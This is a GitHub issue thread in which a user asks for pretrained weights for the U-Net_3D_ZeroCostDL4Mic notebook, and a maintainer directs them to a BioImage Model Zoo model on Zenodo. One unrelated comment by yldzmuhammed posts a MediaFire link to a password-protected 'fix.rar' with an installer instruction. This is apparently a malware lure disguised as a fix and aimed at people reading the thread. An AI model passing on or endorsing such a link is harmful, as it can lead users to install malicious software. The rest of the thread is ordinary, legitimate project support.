### ISSUE TITLE
add weights hdf5 file for notebook  U-Net_3D_ZeroCostDL4Mic

### ISSUE THREAD

**Issue by jazberna1** [HenriquesLab/DL4MicEverywhere#53]
Hello,

This feature request is not strictly to the git repository. I was wondering if there is a possiblity to add somewhere here [https://zenodo.org/records/5940479](https://zenodo.org/records/5940479) a `weights_best.hdf5` file corresponding to the `U-Net_3D_ZeroCostDL4Mic` notebook. That way one could at least use those weights to start training from there instead of doing it from scratch.

Thanks
Jorge

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by IvanHCenalmor** [comment]
Hello @jazberna1,

The Zenodo link you shared is from the application itself, the ZeroCostDL4Mic notebook, which you can find [here](https://bioimage.io/#/?type=application&tags=unet&id=zero%2Fnotebook_u-net_3d_zerocostdl4mic) at the BioImage Model Zoo.

The idea behind the applications in the BioImage Model Zoo is to be agnostic of any dataset. Instead, the weights you are suggesting are included as models in the BioImage Model Zoo. Some of those models are obtained after using some of the ZeroCostDL4Mic notebooks, but the idea is that different trained models (and weights) can be obtained from different datasets, even though they were obtained using the same notebook.

In your case, with the `U-Net_3D_ZeroCostDL4Mic` notebook, the model that you could use is the one trained on `Cell Segmentation from Membrane Staining for Plant Tissues` in the BioImage Model Zoo. The link to the model card is not currently working, but you can check its Zenodo website: https://zenodo.org/records/5888237.

At this moment, you can only find that model at the BioImage Model Zoo, so if you train a new model or fine-tune the existing model, please contribute to the BioImage Model Zoo and share it with the community 🤗.

Let me know what you think about this approach that we are currently following—any ideas are welcome!

Thanks,
Iván

**Comment by jazberna1** [comment]
Hello Iván,

Thanks a lot for the feedback and the clarification. Yes, I understand now that the idea is to use the same model (notebook) on different datasets and share them on BioImage Model Zoo, right? I'll do so.

Thanks too for pointing me to the `Cell Segmentation from Membrane Staining for Plant Tissues`, I coudn't find it myself.

Iván , I'm closing this ticket as everything is clarified now.

Tahnks!!
Jorge
